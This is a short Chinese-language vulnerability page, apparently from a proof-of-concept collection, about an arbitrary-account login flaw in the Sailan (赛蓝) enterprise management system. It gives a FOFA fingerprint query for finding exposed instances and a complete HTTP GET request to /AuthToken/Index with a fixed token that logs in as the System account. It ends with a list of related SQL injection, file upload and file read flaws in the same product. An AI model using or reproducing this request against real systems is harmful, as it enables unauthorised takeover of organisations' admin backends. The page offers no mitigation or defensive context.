赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞

漏洞描述

PoC代码

# 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞



赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞，该漏洞可直接登录后台。



## fofa



```java

body="www.cailsoft.com" || body="赛蓝企业管理系统"

```



## poc



```

GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1

Host: 

```



![image-20240801195959160](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011959230.png)



![image-20240801200007710](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408012000770.png)

相关漏洞推荐

• 赛蓝企业管理系统 GetImportDetailJson SQL注入漏洞
• 赛蓝企业管理系统 /BaseModule/ExcelImport/GetImportDetailJson SQL 注入漏洞
• 赛蓝企业管理系统 GetImportDetailJson SQL注入漏洞
• 赛蓝企业管理系统 GetImportDetailJson SQL注入
• 赛蓝企业管理系统 SubmitUploadify 文件上传漏洞
• 赛蓝企业管理系统GetCssFile任意文件读取漏洞
• 赛蓝企业管理系统 GetFieldJson SQL 注入漏洞
• 赛蓝企业管理系统 EHR_Holidays/SubmitUploadify 任意文件上传漏洞
• 赛蓝企业管理系统 GetCssFile 任意文件读取漏洞
• 赛蓝企业管理系统 GetCssFile存在任意文件读取漏洞
• 赛蓝企业管理系统EHR_Holidays_SubmitUploadify存在任意文件上传漏洞
• 赛蓝企业管理系统GetFieldJson存在SQL注入漏洞
• 赛蓝企业管理系统任意账号登录漏洞